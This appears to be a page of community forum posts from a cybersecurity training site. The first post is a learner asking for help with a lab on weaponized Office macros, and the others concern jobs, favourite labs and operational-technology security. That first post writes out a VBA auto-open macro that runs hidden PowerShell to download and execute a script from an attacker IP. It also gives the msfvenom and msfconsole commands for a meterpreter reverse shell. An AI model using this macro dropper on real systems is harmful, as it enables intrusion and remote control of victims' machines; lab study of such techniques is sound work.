Weaponization: Payloads – Office Macros
I've been banging my head against this brick wall for a few hours now and I could use a second set of eyes. 1. I've created a macro enabled word doc with the following vb code on windows machine: Sub Document_Open() Dim ps as String ps = "powershell.exe -NoExit Invoke-Expression (New-Object Net.WebClient).DownloadString('http://MY_KALI_IP/shell.ps1')" process = Shell(ps, vbhide) End Sub 2. python3 -m http.server to start server to serve shell.ps1 on request 3. msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<Kali IP> lport=443 -f psh > shell.ps1 to create reverse shell with same name the command in the macro script will go looking for 4. create listener with sudo msfconsole, use exploit/multi/handler, set payload windows/meterpreter/reverse_tcp, set LHOST KALI IP, set LPORT 443 then exploit to start listener 5. back on windows machine, go to target_ip:8888, browse to macro doc, submit and execute. What am I missing?67Views1like2CommentsWondering about potential jobs offered after completion of labs....
Hi - I was wondering about the jobs available after completing the labs. I've been a support engineer for five years now, most recently a senior engineer at a Silicon Valley MSP. I've already earned a one-year college Cybersecurity Networking certification from a community college (with a 3.9 GPA) and the Security+. Can someone give me an idea of potential companies? Also are any of the positions remote? I live in the northern California mountains....35Views2likes1CommentWhat's your favourite lab?
Have you completed a lab recently and loved the content? Maybe you encountered some tough content, but through persistence, you overcame the challenge and found it incredibly rewarding. What made the experience so impactful for you? We'd love to hear your thoughts!20Views1like2CommentsOperational Technology a Concern?
"Hey Immersive Labs community, I'm curious about your experiences with Operational Technology (OT) in your organizations. With the increasing convergence of IT and OT across healthcare, education, and various industries, I'm seeing more medical devices, building automation systems, and industrial control systems becoming part of our daily operations. A few questions for the community: How are you currently handling OT security challenges in your environment? What knowledge gaps do you see in your teams when it comes to securing OT systems? For those in healthcare or campus environments - what specific OT challenges keep you up at night? What skills do you wish your teams had to better manage OT security? I believe this is becoming increasingly important as more connected devices and control systems enter our networks. Would love to hear your thoughts and experiences - both challenges and successes. Looking forward to learning from everyone's perspectives!"10Views1like1Comment